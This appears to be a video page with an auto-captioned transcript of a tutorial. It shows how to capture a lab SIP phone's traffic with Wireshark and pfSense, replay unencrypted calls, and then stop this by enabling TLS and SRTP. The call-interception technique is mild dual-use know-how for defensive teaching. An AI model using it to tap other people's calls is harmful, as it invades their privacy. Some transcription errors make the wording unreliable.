Wireshark SIP Capture

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

tom here from orange systems we're going to talk about wireshark and sip there's a lot of fun you can have because wireshark has built in ways to decode sip calls and i want to cover how that works and of course at the end we'll cover how to mitigate against that and i just think it's kind of a fun technical dive into a couple things i've talked about before and showing them well somewhat of a practical use if this is something you want in terms of sniffing out packets and seeing how it goes it's also a fun learning exercise to learn how sip protocol works and what you can glean from sniffing the packets before we dive into that let's first if you'd like to learn more about me or my company head over to lawrences.com if you'd like to hire a sharp project there's a hires button right at the top if you'd like to help keep this channel sponsor free and thank you to everyone who already has there is a join button here for youtube and a patreon page your support is greatly appreciated if you're looking for deals or discounts on products and services we offer on this channel check out the affiliate links down below they're in the description of all of our videos including a link to our shirt store we have a wide variety of shirts that we sell and new designs come out well randomly so check back frequently and finally our forums forums.laurensystems.com is where you can have a more in-depth discussion about this video and other tech topics you've seen on this channel now back to our content not a prerequisite for this video but i want to mention remote real-time packet capture with wireshark and pf sense is a video i've done previously that's the methodology i'll be using capture packets any way that you see fit to me this is the easy way to do it because i happen to have a pf sense on my network and we're going to filter it for this particular device next to me the device next to me is a sangoma phone and i'm just using standard sip protocol because it's the most common protocol out there for the way things are transported the server we're going to be using is not a free pbx server we actually have this set up and these will be some future videos i do where you can set phones up whatever sip phone you'd like directly with a voip mess account this is our mctest face account specifically that we're using and so don't worry about any phone numbers and things i show this is what we're always using mctest for is for testing because sometimes people see a number and they feel compelled to call it that's perfectly fine this is not a customer phone number i don't know why you would call it i don't know if i'll answer it if you do call it anyways not to get off topic but this is set up with the cloud nvr system using sip using voip ms i have a review i'll link to it voip mess for those of you curious and towards the end we're going to cover uh call encryption how to get around this and turning on call encryption which of course is supported by voip mess for those wondering and one last thing i'll mention i'll leave an article here this is one of the reasons that when you use zip because not every sip device has support for call encryption once you see what we can do without encryption you may want to consider encryption but it's also not as big of a deal as you might think because of the passwords that are being passed back and forth yes sip uses md5 for password cracking but this is why you use really long random sip passwords to help mitigate this problem of someone getting in there and potentially grabbing this traffic and pulling your password i'll leave a link to this article i'm not going to dive into the nuance goes out of scope of this but let's have the fun part and talk about how this is going to work so here's our wireshark dash k-i ssh root 3.1 there's our pf sense we're logging into we're using tcp dump it's attached to our lan is on igb0 the host we're filtering for is only one host now the reason and like i said i have a reference video on this is i don't want all the noise on the network i want just the noise that's related to this particular phone and once again we see the ip address of the phone so let's go ahead and kick off that command here and it's going to kick off wireshark and it's going to drop it right in listed mode and not much going on let's make a phone call so we're going to call my office so you don't have to wonder what numbers i'm dialing or play games of dtmf tones so we're calling my main office number that i just dialed wrong i think i sure did so don't listen to those dtf tones there we go and we hope you're having a fantastic day if you know your party's extension you can dial it at any time currently our retail office is closed but this all right pretty simple that was uh test one let's do one more test where i dial in extension thank you for calling large systems and we hope you're having it we have not received a valid response please try again there we go [Music] all right i set this extension up you can hear some echo because it's uh canceling the noise cancellation so it doesn't just you get the idea anyways now we have data we've watched all the data go across here and now we can actually stop wireshark if we don't need to collect anymore go here and hey look here is all the stuff here's our sip we've got a lot of good information here we can see it going through we could probably see the transport layer make tests all right great all these different statuses what does all this mean what are these rtp streams well that's where wireshark becomes fun and we can go right here to pipe calls and there's our first call let's play it and i'm gonna turn the volume up on my laptop here so it should be able to pick up on a microphone and hit play thank you for calling lauren systems and we hope you're having a fantastic day if you know your party's extension you can dial it at any time currently our retail office is closed but this is emergency all right let's try that other one where we actually pressed a lot more buttons thank you for calling lauren systems and we hope you're having fun we have not received a valid response please try again all right set this extension up you can hear because some echo canceling the noise cancellation so it doesn't just get it down you get it anyway all right you kind of see what happened here we were able to dive into it grab the stream replay it back and alls i had to go to was telephony voip calls and it plays them now there's also a lot more you can of course do you can follow the sip statistics we can pull this together and one of the things that so besides the fun that we just had and being able to easily play back a phone call this is where you can dive into and use this to troubleshoot sip problems you're having this is one of the tools that we actually use when we're troubleshooting networks that well they have problems that's the best way to describe it when someone wants us to dive deep into something wireshark can help us go through look for problems look for what flows aren't working my network's set up properly so everything works properly so it's not a big deal by the way in case you're wondering this question comes up this is all done with sipnap which means there's no open ports on the firewall to make this happen sipnet means it reaches out to register with the servers which is of course supported by voipims to bring the registration back and no ports had to be opened there's no special configuration in mypf sense matter of fact i've tested this by taking this phone to different places it works through the majority of firewalls that we've goofed around and tested with without doing any port forwarding i bring that up because some people ask me why you need port forwarding for sip and the answer is if you don't have a provider that properly supports sipnet you'll need that but back over to here one of the other things you can see here is by following the sit flows now you're actually looking at the calls notice anything about these calls 313-299-1503 yes that's our office numbers published on our website so i didn't reveal any secrets here but you're also diving into what step occurred for each piece so you can go back and look at those streams this is what's important about when you're troubleshooting is being able to go back through here look at what happened and of course maybe what didn't happen and you do this by comparison where you'll take a packets from a phone system by looking at them and go okay this one the call went through but this other phone on the other office didn't so you'll trace them you'll do some compare and contrast here to go all right which one of these worked but of course i said i'd tell you how to fix this so let's go ahead and close all this i don't need to save any of these packets and let's go and make changes to this system that allow it to be encrypted now like i said the password was passed through md5 um that is still going to be the case but if we wrap this in a layer of encryption it's going to be a little harder to trace so go ahead and let's dive into that go over here to voip ms and this is the sub account for mr mctestface and mctest space needs encryption so we go here advanced we just say encrypt sip traffic to yes we hit update account i get a notice that it takes one minute for this to take effect cool so not a problem there they have an entire write up pretty easy you could click the question mark of how to set the settings for these accounts how to do that and then of course the notes of what you need to do now there's so many different soft phones and pbx's let's talk about the options i'm going to walk you through how to do it in sangoma but these instructions are kind of generic of course to apply to whatever you're doing whatever type of sip client you have that being said please note not also clients will be able to support this but the sangoma phone does support this now the first thing we do is we're changes from 50 60 to 50 61. so there we go then we got to go here and we change it to tls this is going to be the transport layer security that's we're implementing so those are two changes need to be done there then we'll go ahead and hit save and set oops it wasn't logged in because i timed out yes it's all it's a default password someone's going to go tom you left it at default yeah it's a lab demo it was if you don't know the single default passwords r222 anyways six twos if i didn't say enough so tls 5061 make sure it's save and set account advanced one more thing we need to set here go down and find the srtp mode and we want to set enable and require and that's actually per the instructions here that you'll have to set enable and required and right there's where it said to use 5061. they have some other options if you need other ports back over to the phone though we're going to go ahead and save and set and for good measure i always like to restart the phone after i've saved all settings we'll reboot it i'll just fast forward to the phone being already rebooted and confirm that it registered that way we know it works because having a setting in there i always like to reboot things because eventually they'll get rebooted so i like to make sure that they work on reboot not just when i click the button now so as soon as this reboots we'll log back in we log back in we see the phone's registered and let's go ahead and wireshark it again so we're going to go ahead and just up arrow enter all right and a history and we'll just redial that number again send thank you for calling launch systems and we hope you're having a fantastic day if you know your party's extension you can dial it at any time currently our retail office is closed all right we have some data now let's start digging through this and figure out what wireshark is able to see this time telephony voip calls nothing that was encrypted so i can't tap the phone anymore that's no fun what else can we see let's look at the sip flows nothing well that didn't help me much sip statistics don't even think it's sip traffic anymore now this is where the good and bad comes in by doing this one i have now prevented anyone who could possibly get in between me and my voip provider from tapping the phone calls and that you know could be an issue this is one of the reasons we generally will put phones on a separate network and there's tools like lodp that allow you to automatically do this with vlans et cetera but the other side of this is this makes zip troubleshooting substantially harder not that that's an excuse but sometimes when you're first trying to test something you may want to test it unencrypted go through the troubleshooting process but then once you know it works change those couple settings real quick and move it towards encrypted and this is the good and bad i know there's going to be a bunch of people angry that i would ever say uh it's okay to use an unencrypted sip the reality is you live in the real world one you run into tons of systems especially older systems that we deal with that just don't have these supports they don't support udp in a tls layer together it's just not part of their function or you just run into troubleshooting issues where it's just easier and just change the password later it's just kind of a uh process by which you do it now by the way if you didn't notice in here everything is still being transferred over udp because it's the way phone traffic is done but it's done so completely in an encrypted manner so you know it's a lot more protected now like i said this is a whole process in learning in in my opinion so being able to use these tools being able to do this gives you some better ideas of how these transport layers work how they can be looked at how they can possibly be exploited and i just want to raise awareness of it and get people playing one of the goals i always have with this channel is to get more people into technology i know a lot of homeland people this is a fun thing you can do when you're going okay i built all this fun stuff what can i do with it this is a great way to dive into to get a better understanding of network engineering and you know apply it with all the different phone systems you have it's always fun to me diving into the packets and looking at the flows and everything else i'll leave a link to the other videos i've done on wireshark and of course one i done with pf sends and let me know what else you like and leave some comments below or head over to our forums to have a further and more in-depth discussion thanks and thank you for making it to the end of the video if you like this video please give it a thumbs up if you'd like to see more content from the channel hit the subscribe button and hit the bell icon if you like youtube to notify you when new videos come out if you'd like to hire us head over to lawrences.com fill out our contact page and let us know what we can help you with and what projects you'd like us to work together on if you want to carry on the discussion head over to forums.lawrences.com where we can carry on the discussion about this video other videos or other tech topics in general even suggestions for new videos they're accepted right there on our forums which are free also if you like to help the channel in other ways head over to our affiliate page we have a lot of great tech offers for you and once again thanks for watching and see you next time

Info

Channel: Lawrence Systems

Views: 18,686

Rating: 4.9506173 out of 5

Keywords: lawrencesystems, wireshark sip, wireshark sip troubleshooting, wireshark sip call flow, wireshark sip analysis, wireshark sip capture, wireshark sip capture filter, wireshark sip ladder diagram, wireshark sip tls, wireshark, sip, voip, tutorial, rtp, wireshark (software), session initiation protocol (protocol)

Id: OE7AgTAqNoo

Channel Id: undefined

Length: 14min 56sec (896 seconds)

Published: Tue Oct 13 2020